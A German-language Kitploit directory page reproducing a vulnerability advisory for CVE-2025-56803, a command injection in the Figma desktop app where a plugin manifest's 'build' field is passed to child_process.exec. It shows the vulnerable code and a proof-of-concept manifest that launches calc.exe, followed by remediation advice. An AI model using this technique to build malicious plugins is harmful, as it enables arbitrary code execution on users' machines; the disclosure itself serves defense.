Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-56803 — OS Command Injection-Schwachstelle durch Plugin-Ausführung in der Figma Desktop-Anwendung | Kitploit
Tools/GitHubGitHub/yosasasutsut/cve-2025-56803
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubyosasasutsut/cve-2025-56803

CVE-2025-56803

OS Command Injection-Schwachstelle durch Plugin-Ausführung in der Figma Desktop-Anwendung

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-56803

OS-Befehlsinjektions-Schwachstelle durch Plugin-Ausführung in der Figma-Desktop-Anwendung

1. Überblick

Figma Icon
  • Anwendung: Figma Desktop-Anwendung
  • Version: 125.6.5
  • Anbieter: Figma, Inc.
  • CWE: CWE-78: Unzureichende Neutralisierung spezieller Elemente in einem OS-Befehl („OS Command Injection“)
  • CVSS: 8.4
  • Vector-String: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

2. Zusammenfassung

Die Figma-Desktop-Anwendung (v125.6.5) enthält eine Befehlsinjektionsschwachstelle im Plugin-Loader.
Ein bösartiges Plugin-Manifest (manifest.json) kann das Feld build missbrauchen, das ohne Validierung direkt an übergeben wird. Dadurch wird ein beliebiger OS-Befehl sofort beim Laden des Plugins ausgeführt – ohne Sicherheitswarnungen oder Rückfragen.

child_process.exec()

3. Details

Die Schwachstelle beruht auf Code in main.js, der das integrierte child_process-Modul von Node.js importiert:

root@kitploit:~
Zlt = require("child_process")

Wenn das Feld build in einer Plugin-manifest.json-Datei vorhanden ist und sein Wert ein String ist, führt die Anwendung den Wert direkt mit child_process.exec() ohne jegliche Bereinigung oder Validierung aus:

root@kitploit:~
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;

Daher würde die folgende manifest.json-Datei in einem bösartigen Plugin dazu führen, dass der Wert des build-Felds als OS-Befehl ausgeführt wird:

root@kitploit:~
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Dieser Ausführungsablauf ist in Figmas Plugin-Verarbeitungslogik eingebettet, und die Einbindung des require("child_process")-Aufrufs in main.js bestätigt, dass die Befehlsausführung direkt in die Kernlogik der Anwendung integriert ist.

4. Proof of Concept (PoC)

Durch die Ausführung eines Plugins, das die folgende schädliche manifest.json enthält:

root@kitploit:~
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Sobald dieses Plugin in Figma registriert und ausgeführt wird, wird der angegebene OS-Befehl (calc.exe) sofort ausgeführt.

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7

5. Empfehlungen

Obwohl die Ausführung des build-Felds eine offiziell unterstützte Funktion der Figma-Desktop-Anwendung ist, sollte die Anwendung nach Möglichkeit vermeiden, sich auf benutzergesteuerte Felder in manifest.json wie build zu verlassen.
Falls solche Felder unterstützt werden müssen, müssen sie einer strengen Eingabevalidierung unterzogen werden, um eine Befehlsinjektion zu verhindern.
Darüber hinaus sollte die Verwendung von Node.js child_process.exec() vermieden werden; stattdessen sollten sicherere Alternativen mit expliziter Argumentbehandlung eingesetzt werden.

6. Referenzen

  • https://www.cve.org/CVERecord?id=CVE-2025-56803
  • https://nvd.nist.gov/vuln/detail/CVE-2025-56803
  • https://www.figma.com/plugin-docs/manifest/
Tool herunterladen